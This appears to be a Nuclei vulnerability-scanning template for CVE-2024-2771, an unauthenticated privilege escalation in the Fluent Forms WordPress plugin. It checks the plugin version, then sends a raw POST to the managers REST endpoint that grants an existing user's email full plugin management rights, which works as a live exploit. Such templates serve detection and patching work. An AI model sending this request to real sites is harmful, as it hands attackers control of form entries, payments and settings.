id: CVE-2024-2771

info:
  name: Contact Form Plugin by Fluent Forms < 5.1.17 - Unauthenticated Limited Privilege Escalation
  author: Sourabh-Sahu
  severity: critical
  description: |
    The plugin is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.
  impact: |
    Unauthenticated attackers can grant Fluent Form management permissions to any user account, providing access to all plugin settings and sensitive data.
  remediation: |
    Update Contact Form Plugin by Fluent Forms to version 5.1.17 or later.
  reference:
    - https://github.com/whale93/CVE-2024-2771-PoC
    - https://nvd.nist.gov/vuln/detail/CVE-2024-2771
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/071195d6-3452-4241-a8d3-92efc84e4850?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-2771
    cwe-id: CWE-862
    epss-score: 0.21837
    epss-percentile: 0.95894
    cpe: cpe:2.3:a:fluentforms:contact_form:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/plugins/fluentform/"
    vendor: fluentforms
    product: contact_form
    framework: wordpress
  tags: cve,cve2024,wordpress,fluentforms,wp-plugin,unauth,wp,vkev,vuln

flow: http(1) || http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/fluentform/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '< 5.1.17')
        condition: and

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /wp-json/fluentform/v1/managers HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept-Encoding: gzip, deflate, br

        {
          "manager": {
          "email": "{{email}}",
          "permissions": [
        "fluentform_dashboard_access",
        "fluentform_forms_manager",
        "fluentform_entries_viewer",
        "fluentform_manage_entries",
        "fluentform_view_payments",
        "fluentform_manage_payments",
        "fluentform_settings_manager",
        "fluentform_full_access"
        ]
        }
        }

#exploit requires an existing user email address to work.

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'Manager has been saved.','{{email}}')"
          - "contains(content_type, 'application/json')"
        condition: and
# digest: 4b0a004830460221009e630231d1b078df1766c7df4f4c69534ddc08df63b1cbef8df53cd7bad06186022100bd1f14e1718af4ebd3f07a0750987bef4c4ebcf2f4175c4428afc8bb12739b9a:922c64590222798bb761d5b6d8e72950